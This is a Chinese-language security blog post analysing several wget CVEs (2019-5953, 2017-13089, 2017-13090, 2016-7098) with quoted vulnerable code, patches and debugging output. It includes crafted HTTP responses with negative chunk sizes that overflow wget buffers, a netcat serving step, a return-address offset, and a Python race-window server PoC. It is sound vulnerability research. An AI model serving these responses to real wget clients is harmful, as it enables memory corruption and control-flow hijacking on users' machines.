Nook in the Lunar Mare

Wget漏洞的梳理

Jan 1, 2019

Wget漏洞的梳理

没有大把的时间进行程序开发,积累了不少想法。闲暇时间在研究Angr和Qiling两个框架,后者我觉得解决了很多痛点,原本构想的一些关于插桩的改进点都被这个框架解决了,很棒很优秀的框架。不过其本身只是一个框架,可以考虑基于框架开发一个更有针对性的分析工具(比如病毒分析),使之更易用。

找了比较感兴趣的Linux上的小工具,梳理其漏洞。

CVE-2019-5953 Remote Buffer Overflow Vuln

漏洞描述

Buffer Overflow类型的漏洞,影响范围波及至1.20之前的版本,日本方面的Kusano Kazuhiko发现的漏洞。1.20.2内并没有真正修复,1.20.3版本修复该漏洞。不过发现者不仅没放POC,且对于该漏洞的描述少之又少,邮件列表里就有人吐槽过了(虽然验证是成功的)。

漏洞分析

这个漏洞是在src/iri.c文件内的do_conversion(),用于处理转utf的函数。这个函数取决于目标机是否有iconv,HAVE_ICONV为真的话就会正常编译该功能。

/* Do the conversion according to the passed conversion descriptor cd. *out
   will contain the transcoded string on success. *out content is
   unspecified otherwise.
   NOTE(review): this is the wget 1.20.1 code affected by CVE-2019-5953,
   quoted verbatim for analysis -- the flaw in the E2BIG branch below is
   intentionally left in place. */
static bool
do_conversion (const char *tocode, const char *fromcode, char const *in_org, size_t inlen, char **out)
{
  iconv_t cd;
  /* sXXXav : hummm hard to guess... */
  /* len: total capacity of the output buffer s (excluding the +1 NUL byte);
     done: bytes assumed already produced before the current retry;
     outlen: free bytes left in the output buffer, decremented by iconv(). */
  size_t len, done, outlen;
  int invalid = 0, tooshort = 0;
  char *s, *in, *in_save;

  /* Open a fromcode -> tocode conversion descriptor; report and bail out
     when this encoding pair is unsupported. */
  cd = iconv_open (tocode, fromcode);
  if (cd == (iconv_t)(-1))
    {
      logprintf (LOG_VERBOSE, _("Conversion from %s to %s isn't supported\n"),
                 quote (fromcode), quote (tocode));
      *out = NULL;
      return false;
    }

  /* iconv() has to work on an unescaped string */
  in_save = in = xstrndup (in_org, inlen);
  url_unescape_except_reserved (in);
  inlen = strlen(in);

  /* Initial guess: output at most twice the input size (+1 for the NUL). */
  len = outlen = inlen * 2;
  *out = s = xmalloc (outlen + 1);
  done = 0;

  for (;;)
    {
      /* The second iconv() call (NULL input) flushes any pending shift
         sequence into the output buffer. */
      if (iconv (cd, (ICONV_CONST char **) &in, &inlen, out, &outlen) != (size_t)(-1) &&
          iconv (cd, NULL, NULL, out, &outlen) != (size_t)(-1))
        {
          *out = s;
          /* Terminate after the bytes assumed written: capacity minus the
             space still free.  If 'done' over-counts (see the E2BIG branch),
             this index is miscomputed as well. */
          *(s + len - outlen - done) = '\0';
          xfree(in_save);
          iconv_close(cd);
          IF_DEBUG
          {
            /* do not print out embedded passwords, in_org might be an URL */
            if (!strchr(in_org, '@') && !strchr(*out, '@'))
              debug_logprintf ("converted '%s' (%s) -> '%s' (%s)\n", in_org, fromcode, *out, tocode);
            else
              debug_logprintf ("logging suppressed, strings may contain password\n");
          }
          return true;
        }

      /* Incomplete or invalid multibyte sequence */
      if (errno == EINVAL || errno == EILSEQ)
        {
          if (!invalid)
            logprintf (LOG_VERBOSE,
                      _("Incomplete or invalid multibyte sequence encountered\n"));

          /* Copy the offending byte through unconverted and keep going. */
          invalid++;
          **out = *in;
          in++;
          inlen--;
          (*out)++;
          outlen--;
        }
      else if (errno == E2BIG) /* Output buffer full */
        {
          /// Here Comes the Vuln
          /* BUG (CVE-2019-5953): 'done = len' assumes the old buffer was
             completely filled, but iconv() may stop with outlen > 0 bytes
             still unused.  The grown buffer then keeps an uninitialized
             gap, and the NUL-index computation above goes wrong too. */
          tooshort++;
          done = len;
          len = outlen = done + inlen * 2;
          s = xrealloc (s, outlen + 1);
          *out = s + done;
        }
      else /* Weird, we got an unspecified error */
        {
          logprintf (LOG_VERBOSE, _("Unhandled errno %d\n"), errno);
          break;
        }
    }
    /// Other works ... Skip
    return false;
}

iconv的原型如下,主要功能是根据convert descriptor(cd)将inbuf里的内容转换为另一编码,放置于outbuf中。buf后的byte size都是关于buffer中现有的字节数量,控制最多会读入多少,以及最多写入多少,在转换过程中size的值会变化,*inbuf也会变化。

size_t iconv(iconv_t cd,
             char **inbuf, size_t *inbytesleft,
             char **outbuf, size_t *outbytesleft);

man中描述了convert可能的终止条件,略去成功的主要是3个:

  1. 非法的Byte Sequence,这个好理解,设置的是EILSEQ errno
  2. 不完整的Byte Sequence,比如inbuf里本该都是8字节的sequence,最后只有6字节就结束了。会设置EINVAL,*inbuf会停在此sequence开头。
  3. output buffer不足,设置E2BIG,此外如果inputbuff是NULL而output不为NULL,iconv会在output里放shifting code,如果output太小也会设置该值。

本漏洞出现在E2BIG的情况。out指向的是malloc分配的一块堆内存(在此处作为中间变量s存在),len记录了存放于该内存的字节数量,outlen指示output中可存放字节的数目,在iconv处理时会在内部递减。

      else if (errno == E2BIG) /* Output buffer full */
        {
          /// Here Comes the Vuln
          tooshort++;
          done = len;
          len = outlen = done + inlen * 2;
          s = xrealloc (s, outlen + 1);
          *out = s + done;
        }

触发脚本(失败)

do_conversion整个的调用链大致如下(1.20.1版本):

url_parse

=> remote_to_utf8 (iri, iri->orig_url ? iri->orig_url : url, &new_url);

=> if (do_conversion (“UTF-8”, iri->uri_encoding, str, strlen (str), new))

编译一下1.20.1的版本,需要编译为支持iri,由于我的测试机configure时unistring一直找不到,直接用centos预编译的wget 1.14版本。

mkdir /home/sample
cd /home/sample
wget https://ftp.gnu.org/gnu/wget/wget-1.20.1.tar.gz
tar -zxvf wget-1.20.1.tar.gz
cd wget-1.20.1
./configure
make

gdb调试wget,在do_conversion处下断点,用如下命令可以触发至该处

gdb wget
(gdb)$ r --remote-encoding=UTF-8 --local-encoding=UTF-16 --recursive https://ftp.gnu.org/gnu/Licenses/

E2BIG的值对应的是7,故断在cmp $0x7, %ecx的位置,在我的版本上是do_conversion+208的偏移处。但无法找到合适的url触发至该点。这个漏洞从代码分析来看会造成堆上数据之间存在未初始化过的数据(一个个空洞),不过不知道如何进行利用。发邮件询问仍无消息。

   0x0000000000430000 <+208>:   cmp    $0x7,%ecx
   0x0000000000430003 <+211>:   jne    0x4300c0 <do_conversion+400>
   0x0000000000430009 <+217>:   mov    0x10(%rsp),%rax
   0x000000000043000e <+222>:   lea    0x0(%rbp,%rax,2),%rdi
   0x0000000000430013 <+227>:   mov    %rdi,0x20(%rsp)
   0x0000000000430018 <+232>:   add    $0x1,%rdi
   0x000000000043001c <+236>:   callq  0x436ce0 <xmalloc>
   0x0000000000430021 <+241>:   mov    %rbp,%rdx
   0x0000000000430024 <+244>:   mov    %r12,%rsi
   0x0000000000430027 <+247>:   mov    %rax,%rdi
   0x000000000043002a <+250>:   mov    %rax,%r15
   0x000000000043002d <+253>:   callq  0x4046f0 <memcpy@plt>
   0x0000000000430032 <+258>:   mov    %r12,%rdi
   0x0000000000430035 <+261>:   mov    %r15,%r12
   0x0000000000430038 <+264>:   callq  0x404a50 <free@plt>
   0x000000000043003d <+269>:   lea    (%r15,%rbp,1),%rax
   0x0000000000430041 <+273>:   mov    %rbp,%r15
   0x0000000000430044 <+276>:   mov    0x20(%rsp),%rbp
   0x0000000000430049 <+281>:   mov    %rax,(%rbx)
   0x000000000043004c <+284>:   jmpq   0x42ff88 <do_conversion+88>

Ref

  1. Security Focus

  2. RedHat Report About this

  3. Report email

  4. Fix Patch With Debug Lines

  5. iconv

CVE-2017-13089 Stack Buffer Overflow Vulnerability

Introduction

影响范围至1.19.1之前,在2010年的"Support HTTP/1.1"这个Commit中引入该Bug。漏洞存在于http.c的skip_short_body函数里,该函数用于处理诸如重定向等工作。网上关于这个漏洞的介绍还蛮多,和后面的13090是同时爆出的同类型漏洞。

分析

Http中的Response如果以分片的形式发送会调用strtol()检查分片大小,后面会用MIN(x, 512)这样选取最终的分片大小。但是在调用strtol时没有检查返回值是否为负数(一个long int),若该值为负数,则MIN宏判断x小于512,最终将分片大小值x传递给connect.c中的fd_read(),存在long int到int的类型转换,x的低4字节被作为fd_read()的长度参数。我们便可以控制fd_read的数据写入长度,以及写入的数据。

主要部分的代码块如下,首先满足statcode需要是HTTP_STATUS_UNAUTHORIZED即401,warc_enabled由--warc-file=参数决定,在这里不需要指定。content_len来自于Content-Length字段,在前面解析出来了,需要其小于SKIP_THRESHOLD(4096)。chunked_transfer_encoding默认为false,来自于header里的Transfer-Encoding字段。需要chunked为True,满足三个条件可以进入strtol的位置。

  if (statcode == HTTP_STATUS_UNAUTHORIZED)
    {
      /* Authorization is required.  */
      uerr_t auth_err = RETROK;
      bool retry;
      /* Normally we are not interested in the response body.
         But if we are writing a WARC file we are: we like to keep everyting.  */
      // >>>>>>> warc_enabled <<<<<<<<<<
      //   bool warc_enabled = (opt.warc_filename != NULL);
      if (warc_enabled)
        {
          int _err;
          type = resp_header_strdup (resp, "Content-Type");
          _err = read_response_body (hs, sock, NULL, contlen, 0,
                                    chunked_transfer_encoding,
                                    u->url, warc_timestamp_str,
                                    warc_request_uuid, warc_ip, type,
                                    statcode, head);
          xfree (type);

          if (_err != RETRFINISHED || hs->res < 0)
            {
              CLOSE_INVALIDATE (sock);
              retval = _err;
              goto cleanup;
            }
          else
            CLOSE_FINISH (sock);
        }
      else
        {
          /* Since WARC is disabled, we are not interested in the response body.  */
          if (keep_alive && !head_only
              && skip_short_body (sock, contlen, chunked_transfer_encoding))
            CLOSE_FINISH (sock);
          else
            CLOSE_INVALIDATE (sock);
        }
/// Other Works...
  }

根据代码的处理逻辑,contlen>0和chunked二者有一满足即可。加之HTTP Response在无法明确指定Content-Length字段时可以用Transfer-Encoding: chunked进行分片,此时会忽略Content-Length。综合以上,response包需具备下面的条件

HTTP/1.1 401 Not Authorized
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

// data

每个chunk的Data部分构成如下,最后一个chunk长度段为0,代表结尾。

长度\r\n数据\r\n
Hex换行Hex换行

完整构造的包如下,fd_read写入的目标Buffer大小为512字节,数据量要超过512字节,这里先生成长为1024B的pattern。

HTTP/1.1 401 Not Authorized
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

-0xFFFF0400
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B

0

1.19.2的Patch很简单,在后面补了个长度判断。

               remaining_chunk_size = strtol (line, &endl, 16);
               xfree (line);
 
+              if (remaining_chunk_size < 0)
+                return false;
+
               if (remaining_chunk_size == 0)
                 {
                   line = fd_read_line (fd);

PoC

PoC参考了github上的Poc以及博客中的内容(地址归在Ref节中)。

触发漏洞需要的调用栈如下,依照前面构造的包进行Response

gethttp -> CASE : HTTP_STATUS_UNAUTHORIZED

=> skip_short_body (sock, contlen, chunked_transfer_encoding)

=> connect.c : fd_read (fd, buf, bufsize, timeout)

编译1.19.1版本wget,make之后的二进制文件在src里面。

# option -- 考虑测试exploit的话,configure.ac带上CFLAGS="-fno-stack-protector $CFLAGS"编译
# 关掉NX保护CFLAGS="-z execstack $CFLAGS"

cd /home/sample
wget https://ftp.gnu.org/gnu/wget/wget-1.19.1.tar.gz
tar -zxvf wget-1.19.1.tar.gz
cd wget-1.19.1
./configure --prefix=/home/sample/usr --sysconfdir=/home/sample/etc --docdir=/home/sample/doc/wget --with-ssl=openssl
make

创建vuln_response,内容为我们构造的数据包,nc启动监听模拟收包行为,由于编译时没有加入debug info,在源码中相应位置加入了打印语句

# shell 1st
nc -lp 2333 < vuln_response

# shell 2nd
[root@centos ]# ./wget 127.0.0.1:2333
Connecting to 127.0.0.1:2333... connected.
HTTP request sent, awaiting response... 401 Not Authorized
[Mod]: Chunked Size : -4294902784
[Mod]: Before Read the contlen is 64512
0x7fff9f420350: 41 61 30 41   61 31 41 61   Aa0A a1Aa
0x7fff9f420358: 32 41 61 33   41 61 34 41   2Aa3 Aa4A
0x7fff9f420360: 61 35 41 61   36 41 61 37   a5Aa 6Aa7
0x7fff9f420368: 41 61 38 41   61 39 41 62   Aa8A a9Ab
0x7fff9f420370: 30 41 62 31   41 62 32 41   0Ab1 Ab2A
....
[Mod]: Now the contlen is 512
[Mod]: Before Read the contlen is 512
0x7fff9f420350: 41 61 30 41   61 31 41 61   Aa0A a1Aa
0x7fff9f420358: 32 41 61 33   41 61 34 41   2Aa3 Aa4A
0x7fff9f420360: 61 35 41 61   36 41 61 37   a5Aa 6Aa7
0x7fff9f420368: 41 61 38 41   61 39 41 62   Aa8A a9Ab
0x7fff9f420370: 30 41 62 31   41 62 32 41   0Ab1 Ab2A
....

Segmentation fault (core dumped)

产生segment fault,打开gdb调试一下,此时已经完成rbp的恢复,则此时rsp指向位置即为retn地址,本机上偏移地址为616,后续工作集中于绕过安全机制,劫持控制流。

cd /tmp/cores
gdb core-xxx
(gdb)$ file  /home/sample/wget-1.19.1/src/wget
(gdb)$ info reg
rax            0x0      0
rbx            0x3174413074413973       3563544881521572211
rcx            0x35     53
rdx            0x0      0
rsi            0x0      0
rdi            0x7fff9f41fd90   140735865290128
rbp            0x4134754133754132       0x4134754133754132
rsp            0x7fff9f4205b8   0x7fff9f4205b8
rip            0x41fb7e 0x41fb7e <skip_short_body+1175>
(gdb) x /s $rsp
0x7fff9f4205b8: "u5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1"...

思考一下攻击场景,构造一个看似正常的下载网址,但是永远返回这个response。或者是一个下载网站,其中大量的正常文件,但是隐藏一个返回该包的链接,wget recursive下载的时候中招。

Ref

1. Security Focus Report

2. Redhat Community

3. Fix Patch

4. Seebug

5. Leeeddin Blog

6. github exploit example

7. Chunked Size

8. online Pattern gen

CVE-2017-13090 Heap Buffer Overflow Vulnerability

Introduction

和上面的13089同类型漏洞,漏洞存在于retr.c:fd_read_body()中,未检查strtol的返回值为负数的情况。

漏洞分析

漏洞触发代码如下,exact来自于rb_read_exactly选项,需要其为False(不指定),sum_read代表目前读取的字符,和toread一起控制循环,其余的同13089类似,只是本次的dlbuf是通过xmalloc(dlbufsize)进行分配,dlbufsize来自于max(BUFSIZ, 8 * 1024)。

/* Read the body of a server response from fd, writing it to 'out'.
   Excerpt quoted from wget retr.c (pre-CVE-2017-13090 fix); variables such
   as 'exact', 'chunked', 'sum_read', 'dlbuf', 'dlbufsize', 'ret' and
   'remaining_chunk_size' are declared in the elided "/// Other Works"
   sections.  NOTE(review): the strtol() result below is never checked for
   a negative value -- that is the vulnerability. */
int
fd_read_body (const char *downloaded_filename, int fd, FILE *out, wgint toread, wgint startpos,

              wgint *qtyread, wgint *qtywritten, double *elapsed, int flags,
              FILE *out2)
{
    /// Other Works ...
  while (!exact || (sum_read < toread))
    {
      int rdsize;
      double tmout = opt.read_timeout;

      if (chunked)
        {
          /* At a chunk boundary: read and parse the next chunk-size line. */
          if (remaining_chunk_size == 0)
            {
              char *line = fd_read_line (fd);
              char *endl;
              if (line == NULL)
                {
                  ret = -1;
                  break;
                }
              else if (out2 != NULL)
                fwrite (line, 1, strlen (line), out2);

              /* BUG (CVE-2017-13090): no check that the parsed value is
                 non-negative; a hostile chunk-size line such as
                 "-0xFFFF2710" yields a negative remaining_chunk_size. */
              remaining_chunk_size = strtol (line, &endl, 16);
              xfree (line);

              if (remaining_chunk_size == 0)
                {
                  /* Zero-size chunk terminates the body; consume the
                     trailing line after it. */
                  ret = 0;
                  line = fd_read_line (fd);
                  if (line == NULL)
                    ret = -1;
                  else
                    {
                      if (out2 != NULL)
                        fwrite (line, 1, strlen (line), out2);
                      xfree (line);
                    }
                  break;
                }
            }

          /* With a negative chunk size MIN() picks the negative value,
             which is then narrowed into the int 'rdsize' and handed to
             fd_read() as the read length (per the analysis above). */
          rdsize = MIN (remaining_chunk_size, dlbufsize);
        }
      else
        rdsize = exact ? MIN (toread - sum_read, dlbufsize) : dlbufsize;

      /// Other Works ...
      
      ret = fd_read (fd, dlbuf, rdsize, tmout);

      /// Other Works ...
  return ret;
}

在http.c里找到一个调用fd_read_body()的位置,其在read_response_body中。

/* Download the body of an HTTP response and write it to fp (and, when WARC
   capture is active, to warc_tmp as well).  Elided excerpt from wget
   http.c; 'flags' and 'warc_tmp' are set up in the omitted parts.  Shown
   here as one call path into the vulnerable fd_read_body() above. */
static int
read_response_body (struct http_stat *hs, int sock, FILE *fp, wgint contlen,
                    wgint contrange, bool chunked_transfer_encoding,
                    char *url, char *warc_timestamp_str, char *warc_request_uuid,
                    ip_address *warc_ip, char *type, int statcode, char *head)
{
    /// Other Works ...
  /* Download the response body and write it to fp.
     If we are working on a WARC file, we simultaneously write the
     response body to warc_tmp.  */
  hs->res = fd_read_body (hs->local_file, sock, fp, contlen != -1 ? contlen : 0,
                          hs->restval, &hs->rd_size, &hs->len, &hs->dltime,
                          flags, warc_tmp);
    
    /// Other Works
}

若要触发至此处,仍需使用chunk字段,HTTP_STATUS_UNAUTHORIZED且需要enable warc。另一个触发方法是gethttp中返回值为OK时,触发到read_response_body。

PoC

先把源码打上CVE-2017-13089的Patch,修复前面的漏洞,在http.c的skip_short_body处补上检查,我还修改了retr.c,打印一下bufsize。

index 55367688..dc318231 100644
--- a/src/http.c
+++ b/src/http.c
@@ -973,6 +973,9 @@ skip_short_body (int fd, wgint contlen, bool chunked)
               remaining_chunk_size = strtol (line, &endl, 16);
               xfree (line);
 
+              if (remaining_chunk_size < 0)
+                return false;
+
               if (remaining_chunk_size == 0)
                 {
                   line = fd_read_line (fd);

重新编译

rm src/http.o src/retr.o
make

构造了一个返回状态为200 OK的数据包,测试到的Buff size为8192,生成了一个10000长度的pattern,底下为了页面显示做了截断。

HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

-0xFFFF2710
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5......

0

如前一个漏洞,对其进行测试,产生segment fault

Connecting to 127.0.0.1:2333... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘index.html.2’
alloc Buff size 8192

index.html.2               [<=>                          ]       0  --.-KB/s               Segmentation fault (core dumped)

查看寄存器和汇编码,停在如下位置,目前的返回地址为616偏移处,意味着依旧可以劫持控制流。

   0x000000000041fb74 <+1165>:  callq  0x42ab4c <debug_logprintf>
   0x000000000041fb79 <+1170>:  mov    $0x1,%eax
=> 0x000000000041fb7e <+1175>:  add    $0x2c8,%rsp

rax            0x0      0
rbx            0x3174413074413973       3563544881521572211
rcx            0x35     53
rdx            0x0      0
rsi            0x0      0
rdi            0x7fff9f41fd90   140735865290128
rbp            0x4134754133754132       0x4134754133754132
rsp            0x7fff9f4205b8   0x7fff9f4205b8
r8             0x0      0
r9             0x7f55b7b6714d   140006131134797
r10            0x69     105
r11            0x246    582
r12            0x7441337441327441       8377033356288881729
r13            0x4136744135744134       4699071084626198836
r14            0x3974413874413774       4140005668184733556
r15            0x7541317541307541       8449088755598390593
rip            0x41fb7e 0x41fb7e <skip_short_body+1175>
eflags         0x10206  [ PF IF RF ]

Ref

1. Security Focus report

2. RedHat Report

3. Fix Patch

CVE 2014-4877

已有详尽的分析,比较古老的漏洞,影响1.13至1.16版本。可以用Metasploit的相应模块进行攻击利用。

1. 分析

2. Metasploit Code

3. report

CVE-2016-7098

一个偏向条件竞争引起的文件写入漏洞。漏洞发现者在mailing list中附上了POC,其中有详细的漏洞介绍。运用条件可能比较苛刻,结合其他攻击手段才有威胁。其中mailing list对于wget的temp file引入漏洞做了比较详细的讨论,很值得一读。影响1.18之下的版本

分析和复现

hack的地方主要是recursive那里,使用recursive进行文件获取时,可以用-A(--accept)、-R(--reject)加上'A.txt,B.txt,*.jpg'这样的逗号分隔列表选择接受或拒绝的文件。

"Recursive Accept/Reject Options:
  -A acclist --accept acclist
  -R rejlist --reject rejlist

Specify comma-separated lists of file name suffixes or patterns to accept or 
reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in 
an element of acclist or rejlist, it will be treated as a pattern, rather 
than a suffix."

但是若在此情况下仅向服务器请求一个文件,wget只会在download进程结束时进行accept的检查,在文件下载完成到下载进程结束有一段空窗期,举个例子,想下载并查看attack-server上的一些图片,cd到某个目录下,使用

wget -r -nH -A '*.jpg' http://attackers-server/vacation.php

攻击者可把持住http连接,使之暂时不中断,在这段营造出来的时间里该php文件是存在的。(之后由于不在accept列表里会被wget删除)

在攻击机上布置如下代码

# encoding: utf-8
# PoC server for CVE-2016-7098: answers every GET, then keeps the HTTP
# connection open for a few seconds so the file wget has just saved stays
# on disk during that window, before wget rejects and deletes it.

import http.server as SimpleHTTPServer
import time
import socketserver as SocketServer

# IP = '127.0.0.1'
IP = '0.0.0.0'
PORT = 80

class wget_exp(SimpleHTTPServer.BaseHTTPRequestHandler):
    # Handler: send a small plain-text body, then sleep to hold the
    # connection (and thus the race window) open.
    def do_GET(self):
        print("recv wget request: " + self.path)
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(bytes("U r in the /tmp path, and open this right? :)", encoding="utf-8"))

        # Widen the race window by increasing this delay.
        time.sleep(5)

        print("Dead")
        return

handler = SocketServer.TCPServer((IP, PORT), wget_exp)
handler.serve_forever()

在特定目录下"意外"使用了wget命令(漏洞报告者构想的场景是以web账户在web目录下运行了相应的命令,比如创建的是一个php文件,导致这段时间内攻击者可以连接到phpshell中),可以看到这段时间中secret.py存在了一段时间(5s),可以通过修改代码的sleep增大时间。

>>>>>>>>>>>>>>>> Victim tmp/tmpintmp/ path <<<<<<<<<<<<<<<<<<<
[user] ls -la
total 12
drwxr-xr-x   2 root root 4096  .
drwxrwxrwt. 11 root root 4096  ..
-rw-r--r--   1 root root   45  secret.py

[user] ls -la
total 8
drwxr-xr-x   2 root root 4096  .
drwxrwxrwt. 11 root root 4096  ..

>>>>>>>>>>>>>>>> Victim Wget Console <<<<<<<<<<<<<<<<<<<<<
wget -r -nH -A '*.jpg' http://127.0.0.1/secret.py
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘secret.py’

    [      <=>                                                                                                                                          ] 45          --.-K/s   in 4.8s    

[time] (9.47 B/s) - ‘secret.py’ saved [45]

Removing secret.py since it should be rejected.

FINISHED [time]--
Total wall clock time: 5.0s
Downloaded: 1 files, 45 in 4.8s (9.47 B/s)

在http.c里对生成的临时文件做了权限上的限制,修正至rw。

@@ -39,6 +39,7 @@ as that of the covered work.  */
 #include <errno.h>
 #include <time.h>
 #include <locale.h>
+#include <fcntl.h>
 
 #include "hash.h"
 #include "http.h"
@@ -2471,7 +2472,17 @@ open_output_stream (struct http_stat *hs, int count, FILE **fp)
           open_id = 22;
           *fp = fopen (hs->local_file, "wb", FOPEN_OPT_ARGS);
 #else /* def __VMS */
-          *fp = fopen (hs->local_file, "wb");
+          if (opt.delete_after
+            || opt.spider /* opt.recursive is implicitely true */
+            || !acceptable (hs->local_file))
+            {
+              *fp = fdopen (open (hs->local_file, O_BINARY | O_CREAT | O_TRUNC | O_WRONLY, S_IRUSR | S_IWUSR), "wb");
+            }
+          else
+            {
+              *fp = fopen (hs->local_file, "wb");
+            }
+
 #endif /* def __VMS [else] */
         }
       else

后面一个commit,由于担心CVE被利用,又补上了下面的部分,在临时文件后面使用.tmp后缀进行标识,应该是为了防止现有系统上的文件被覆盖(在Ref部分的discussion中讨论了man文档中recursive部分描述和警告不足的问题,容易引起用户的误解)。

+  hs->temporary = opt.delete_after || opt.spider || !acceptable (hs->local_file);
+  if (hs->temporary)
+    {
+      char *tmp = NULL;
+      asprintf (&tmp, "%s.tmp", hs->local_file);
+      xfree (hs->local_file);
+      hs->local_file = tmp;
+    }
+

不过这个patch感觉依旧不是很完美,限制了rw权限,对于脚本来说在一些情况下仍然可能被程序调用执行。而重命名至tmp后缀则是一个比较弱的过滤选项,根源还是在创建临时文件这里,wget的维护者讨论过这些,取消temp file并重构代码留待wget2完成。

ref

1. report

2. exploit db

3. Mailing list

4. discussion about the design and more potential risks revealed by this CVE(and possible improvements)

一些体会

wget的漏洞数量都比较少,漏洞大致归于如下

  1. 数值变量溢出
  2. Temp file带来的一些问题(如文件系统任意写)
  3. recursive模式引入的一些问题